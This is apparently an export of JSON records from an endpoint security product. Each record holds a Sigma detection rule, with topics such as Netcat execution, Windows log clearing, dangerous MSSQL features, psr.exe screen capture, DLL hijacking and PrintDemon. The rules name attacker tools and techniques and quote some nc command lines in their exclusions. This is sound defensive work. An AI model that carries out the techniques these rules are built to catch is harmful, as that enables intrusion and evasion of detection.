- ParentImage: '/usr/bin/nxagentd'\n - GrandparentImage: '/usr/bin/nxagentd'\n\n exclusion_nagios:\n - ParentCommandLine|startswith:\n - '/bin/bash /usr/lib/nagios/plugins/'\n - '/bin/bash /usr/lib64/nagios/plugins/'\n - '/bin/bash /opt/nagiosagent/current/nagios_plugins/'\n - '/opt/nagiosagent/current/perl/bin/perl -w /opt/nagiosagent/current/bin/nagiosAgent'\n - GrandparentCommandLine|startswith:\n - '/bin/bash /usr/lib/nagios/plugins/'\n - '/bin/bash /usr/lib64/nagios/plugins/'\n\n exclusion_grafity:\n - ParentCommandLine|startswith: '/bin/sh -c /home/mvfadm/./MvfES2GrafityFormat.py'\n\n exclusion_kafka:\n - ParentCommandLine|startswith: '/usr/bin/ksh /opt/operating/bin/OperateKafkaAll'\n - CommandLine: 'nc -z kafka 9092'\n\n exclusion_kitproxy:\n CommandLine|contains: '/bin/nc kit-proxy 1234'\n\n exclusion_haproxy:\n - CommandLine: 'nc -U /var/lib/haproxy/stats'\n - ParentCommandLine|startswith: 'sh -c echo \"show stat\" | nc -U /var/lib/haproxy/stats'\n\n exclusion_healthcheck:\n # /bin/bash /healthcheck.sh\n # bash /healthcheck.sh\n ParentCommandLine|endswith: '/healthcheck.sh'\n\n exclusion_molis:\n ParentCommandLine|startswith: '/bin/bash /usr/molis/molis*/bin/ll_send2server'\n\n exclusion_vectra:\n ProcessGrandparentCommandLine: '/bin/bash /usr/sbin/vsensor-health-check.sh'\n\n exclusion_cron:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b594e09f-86e5-4b70-a942-e1e2bb362f05",
"rule_name": "Netcat Execution (Linux)",
"rule_description": "Detects the execution of Netcat, a networking utility that reads and writes data across network connections.\nNetcat can be used by attackers to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\nIt is recommended to analyze the process responsible for the execution of netcat as well as the to analyze the command-line arguments to determine whether its usage is legitimate.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021",
"attack.t1046",
"attack.t1049",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b5bd4ea0-bd89-49d6-9867-4f1b6a100c82",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626692Z",
"creation_date": "2026-03-23T11:45:34.626694Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626699Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_security_log.yml",
"content": "title: Windows Security Log Cleared\nid: b5bd4ea0-bd89-49d6-9867-4f1b6a100c82\ndescription: |\n Detects the Windows Security audit log being cleared.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n Windows Event Logs are a record of a computer's alerts and notifications.\n It is recommended to check for other malicious behavior on the host with the help of the machine's timeline.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2021/04/27\nmodified: 2026/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 1102\n Source: 'Microsoft-Windows-Eventlog'\n ProcessImage|contains: '?'\n\n exclusion_image:\n - ProcessImage:\n - '?:\\Windows\\System32\\Sysprep\\sysprep.exe'\n - '?:\\Windows\\System32\\mmc.exe'\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\Citrix.Wem.Agent.Service.exe'\n - '*\\CitrixOptimizer\\CitrixOptimizerTool.exe'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n\n exclusion_commandline:\n ProcessGrandparentCommandLine|contains: '?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\'\n\n exclusion_ccleaner:\n ProcessDescription: 'CCleaner Service'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'PIRIFORM SOFTWARE LIMITED'\n - 'Gen Digital Inc.'\n\n exclusion_ccleaner_nosign:\n ProcessDescription: 'CCleaner Service'\n ProcessCompany:\n - 'Piriform Software Ltd'\n - 'Gen Digital Inc.'\n ProcessProduct: 'CCleaner'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b5bd4ea0-bd89-49d6-9867-4f1b6a100c82",
"rule_name": "Windows Security Log Cleared",
"rule_description": "Detects the Windows Security audit log being cleared.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nWindows Event Logs are a record of a computer's alerts and notifications.\nIt is recommended to check for other malicious behavior on the host with the help of the machine's timeline.\n",
"rule_creation_date": "2021-04-27",
"rule_modified_date": "2026-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b5d9a8b3-cbd7-4488-8875-db3142c7cadc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092226Z",
"creation_date": "2026-03-23T11:45:34.092228Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092233Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16",
"https://learn.microsoft.com/fr-fr/sql/database-engine/configure-windows/clr-enabled-server-configuration-option?view=sql-server-ver16",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_dangerous_configuration.yml",
"content": "title: Dangerous MSSQL Functionality Enabled\nid: b5d9a8b3-cbd7-4488-8875-db3142c7cadc\ndescription: |\n Detects the activation of dangerous MSSQL functionalities or deactivation of security features that could lead to code execution.\n Attackers may enable functionalities or disable security features in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the associated sqlservr.exe process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16\n - https://learn.microsoft.com/fr-fr/sql/database-engine/configure-windows/clr-enabled-server-configuration-option?view=sql-server-ver16\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/02/05\nmodified: 2025/07/31\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n service: application\ndetection:\n selection_event:\n Source: 'MSSQLSERVER'\n EventID: 15457\n\n selection_feature_enabled:\n event_data.param0: # parameter name\n # - 'xp_cmdshell' # cmd execution - too much false positive, handled by another rule\n - 'clr enabled' # .net assembly loading\n - 'Ole Automation Procedures' # OLE Script execution\n - 'external scripts enabled' # Python or R script execution\n # - 'Ad Hoc Distributed Queries' # Run unsafe Visual Basic for Application functions\n event_data.param2: 1 # new value\n\n selection_feature_disabled:\n event_data.param0: 'clr strict security' # allows for unsigned .net assembly loading\n event_data.param2: 0 # new value\n\n condition: selection_event and 1 of selection_feature_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b5d9a8b3-cbd7-4488-8875-db3142c7cadc",
"rule_name": "Dangerous MSSQL Functionality Enabled",
"rule_description": "Detects the activation of dangerous MSSQL functionalities or deactivation of security features that could lead to code execution.\nAttackers may enable functionalities or disable security features in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check if this behavior is expected and check for malicious activities stemming from the associated sqlservr.exe process.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-07-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b607e37d-aaf6-49a2-8a8c-e021f3ccfd3f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611363Z",
"creation_date": "2026-03-23T11:45:34.611366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611374Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Psr/",
"https://attack.mitre.org/techniques/T1113/"
],
"name": "t1113_suspicious_process_psr.yml",
"content": "title: Execution of psr.exe\nid: b607e37d-aaf6-49a2-8a8c-e021f3ccfd3f\ndescription: |\n Detects the execution of the legitimate psr.exe Windows binary, which is a built-in tool for capturing system resource usage and screen captures.\n Attackers can abuse this tool to perform unauthorized screen captures, potentially gathering sensitive information about the victim's desktop.\n A suspicious usage example includes recording a user's screen without creating a graphical user interface (GUI).\n It is recommended to investigate such executions, review the permissions of the user account executing psr.exe, and ensure that screen capture activities are legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Psr/\n - https://attack.mitre.org/techniques/T1113/\ndate: 2022/04/11\nmodified: 2025/04/16\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1113\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Psr\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\psr.exe'\n - OriginalFileName: 'psr.exe'\n selection_commandline:\n CommandLine|contains: '/start'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/networking/data-collection-for-troubleshooting-802-1x-authentication-issues\n exclusion_troubleshooting:\n CommandLine:\n - 'psr /start /output ?:\\MSLOG\\\\*_psr.zip /maxsc 100'\n - '?:\\windows\\system32\\psr.exe /start /output ?:\\MSLOG\\\\*_psr.zip /maxsc 100'\n\n # https://learn.microsoft.com/en-us/microsoft-365/troubleshoot/diagnostic-logs/use-msoaid-for-authentication-issues\n exclusion_msoaid_parent:\n ProcessParentOriginalFileName: 'MSOAID-Win.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n exclusion_msoaid_grandparent:\n ProcessGrandparentOriginalFileName: 'MSOAID-Win.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b607e37d-aaf6-49a2-8a8c-e021f3ccfd3f",
"rule_name": "Execution of psr.exe",
"rule_description": "Detects the execution of the legitimate psr.exe Windows binary, which is a built-in tool for capturing system resource usage and screen captures.\nAttackers can abuse this tool to perform unauthorized screen captures, potentially gathering sensitive information about the victim's desktop.\nA suspicious usage example includes recording a user's screen without creating a graphical user interface (GUI).\nIt is recommended to investigate such executions, review the permissions of the user account executing psr.exe, and ensure that screen capture activities are legitimate.\n",
"rule_creation_date": "2022-04-11",
"rule_modified_date": "2025-04-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1113"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b60df06d-a3a6-4d8c-aa52-2fa9cb0aa028",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593280Z",
"creation_date": "2026-03-23T11:45:34.593283Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593291Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://infosecwriteups.com/dll-hijacking-persistence-using-discord-80691a63c559",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_discord.yml",
"content": "title: Phantom DLL Hijacking via Discord\nid: b60df06d-a3a6-4d8c-aa52-2fa9cb0aa028\ndescription: |\n Detects a potential Windows DLL search order hijacking via discord.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://infosecwriteups.com/dll-hijacking-persistence-using-discord-80691a63c559\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'discord.exe'\n ImageLoaded|endswith: '\\Discord\\app-?.?.????\\d3d12.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Discord Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b60df06d-a3a6-4d8c-aa52-2fa9cb0aa028",
"rule_name": "Phantom DLL Hijacking via Discord",
"rule_description": "Detects a potential Windows DLL search order hijacking via discord.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b64483ff-8815-49ef-be8a-4621359d1de2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296583Z",
"creation_date": "2026-03-23T11:45:35.296585Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296590Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_file_create_osascript.yml",
"content": "title: File Created by a Process Launched by Osascript\nid: b64483ff-8815-49ef-be8a-4621359d1de2\ndescription: |\n Detects a file creation by a process whose ancestors include Osascript.\n Adversaries may use Osascript to drop malicious files.\n It it recommended to check the maliciousness of the created file and other actions made by the Osascript process.\nreferences:\n - https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/06/18\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.LOLBin.osascript\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n Kind: 'create'\n ProcessAncestors|contains: '/usr/bin/osascript'\n\n exclusion_docker:\n - ProcessImage: '/Applications/Docker.app/Contents/MacOS/com.docker.backend run'\n - ProcessCommandLine: 'sh -c echo * > /tmp/docker-desktop-privileged*/exitcode.txt'\n\n exclusion_football_league:\n Path|contains: '/FootballLeagueApp/'\n ProcessImage: '/bin/pax'\n ProcessGrandparentCommandLine|startswith: 'osascript -l JavaScript - wid:'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b64483ff-8815-49ef-be8a-4621359d1de2",
"rule_name": "File Created by a Process Launched by Osascript",
"rule_description": "Detects a file creation by a process whose ancestors include Osascript.\nAdversaries may use Osascript to drop malicious files.\nIt it recommended to check the maliciousness of the created file and other actions made by the Osascript process.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-23",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b65427c9-a48f-4b0c-9565-50145be9c5fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611266Z",
"creation_date": "2026-03-23T11:45:34.611269Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611277Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://windows-internals.com/printdemon-cve-2020-1048/",
"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1337",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_malicious_printer_port.yml",
"content": "title: Malicious Printer Port Installed\nid: b65427c9-a48f-4b0c-9565-50145be9c5fb\ndescription: |\n Detects a registry modification to the \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\\" key, indicanting that a potentially malicious printer port was added.\n This could be the sign of CVE-2020-1048 or CVE-2020-1337 exploitation (aka PrintDemon).\n PrintDemon is a security flaw related to the Windows Print Spooler service wich exploits the way Windows handles print jobs through the spooler service, which runs with SYSTEM privileges.\n It is recommended to investigate the registry modification to determine its legitimacy.\nreferences:\n - https://windows-internals.com/printdemon-cve-2020-1048/\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1337\n - https://attack.mitre.org/techniques/T1112/\ndate: 2020/09/24\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.defense_evasion\n - attack.t1112\n - cve.2020-1048\n - cve.2020-1337\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.PrintDemon\n - classification.Windows.Exploit.CVE-2020-1048\n - classification.Windows.Exploit.CVE-2020-1337\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_event:\n EventType:\n - 'SetValue'\n - 'DeleteValue' # want to catch the process removing the EoP\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\'\n\n selection_file:\n TargetObject|endswith:\n - '.dll'\n - '.exe'\n - '.sys'\n - '.ps1'\n - '.vbs'\n - '.bat'\n - '.com'\n\n condition: all of selection_*\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b65427c9-a48f-4b0c-9565-50145be9c5fb",
"rule_name": "Malicious Printer Port Installed",
"rule_description": "Detects a registry modification to the \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\\" key, indicanting that a potentially malicious printer port was added.\nThis could be the sign of CVE-2020-1048 or CVE-2020-1337 exploitation (aka PrintDemon).\nPrintDemon is a security flaw related to the Windows Print Spooler service wich exploits the way Windows handles print jobs through the spooler service, which runs with SYSTEM privileges.\nIt is recommended to investigate the registry modification to determine its legitimacy.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b6605352-f429-404f-a2c4-e4a55585deb0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083634Z",
"creation_date": "2026-03-23T11:45:34.083636Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083640Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.joeware.net/freetools/tools/lg/index.htm",
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://attack.mitre.org/techniques/T1069/001/"
],
"name": "t1069_001_localgroup_via_lg.yml",
"content": "title: Local Group Discovered via LG.exe\nid: b6605352-f429-404f-a2c4-e4a55585deb0\ndescription: |\n Detects the execution of the LG.exe executable in order to discover local groups.\n Adversaries may attempt to find local system groups and permission settings.\n The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n It is recommended to investigate the process calling LG.exe to look for malicious content.\nreferences:\n - https://www.joeware.net/freetools/tools/lg/index.htm\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://attack.mitre.org/techniques/T1069/001/\ndate: 2023/09/04\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'LG.cpp'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b6605352-f429-404f-a2c4-e4a55585deb0",
"rule_name": "Local Group Discovered via LG.exe",
"rule_description": "Detects the execution of the LG.exe executable in order to discover local groups.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nIt is recommended to investigate the process calling LG.exe to look for malicious content.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b6be76e7-26f5-4dea-995f-08163fda806c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078675Z",
"creation_date": "2026-03-23T11:45:34.078677Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078681Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dwm.yml",
